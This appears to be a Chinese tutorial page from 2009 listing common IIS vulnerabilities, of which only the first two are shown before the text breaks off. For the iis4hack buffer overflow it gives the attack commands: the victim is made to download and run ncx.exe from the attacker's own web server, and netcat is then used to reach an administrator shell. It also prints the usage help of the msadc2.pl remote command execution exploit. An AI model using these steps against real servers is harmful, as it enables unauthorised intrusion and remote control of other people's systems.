当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > IIS的十七个常见漏洞

安全防护
如何正确预防网页中的5种“隐形杀手”
cpu散热技巧方法和六大误区
隐患起于灰尘!机箱内部风扇清理有妙招
电源常见故障判断分析与排除
主板常见故障分类及排除方法
绝杀病毒木马的好工具:ESET NOD32
三种方法解决IIS6目录检查漏洞
硬盘坏道故障实例解决
做好防范措施 让你的MP3拒绝病毒的入侵
彻底查杀网页病毒 断绝一切安全隐患
移动安全之手机病毒入侵的解决
中国PC用户个人上网十则网络安全指南
如何使tcp包和udp包穿透网络防火墙
细说iexplore.exe是进程还是病毒
如何用网络入侵检测系统防范黑客攻击
对Autorun.inf类U盘病毒的攻防经验总结
护花使者:远程修复MM的受损系统
绕过主动防御 木马病毒刺穿卡巴斯基
脚本图片类后门病毒的完美使用方法
QQ盗号木马USBINE.SYS暂时解决方法

安全防护 中的 IIS的十七个常见漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 33 ::
收藏到网摘: n/a

1. iis4hack缓冲溢出  
     主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序  在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器: 
                 
 c:>iishack.exe <victim> 80 <your web server>/ncx.exe 
                  
然后你就使用netcat来连接你要检测的服务器: 
                  
c:>nc <victim> 80  
 如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip 
                 
 2.msadc  
     IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help 
                  [quack@chat quack]$ perl msadc2.pl -h 
                  -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- 
                  Usage: msadc.pl -h <host> { -d <delay> -X -v } 
                  -h <host> = host you want to scan (ip or domain) 
                  -d <seconds> = delay between calls, default 1 second 
                  -X = dump Index Server path table, if available 
                  -N = query VbBusObj for NetBIOS name 
                  -V = use VbBusObj instead of ActiveDataFactory 
                  -v = verbose 
                  -e = external dictionary file for step 5 
                  -u <\hostsharefile> = use UNC file 
                  -w = Windows 95 instead of Windows NT 
                  -c = v1 compatibility (three step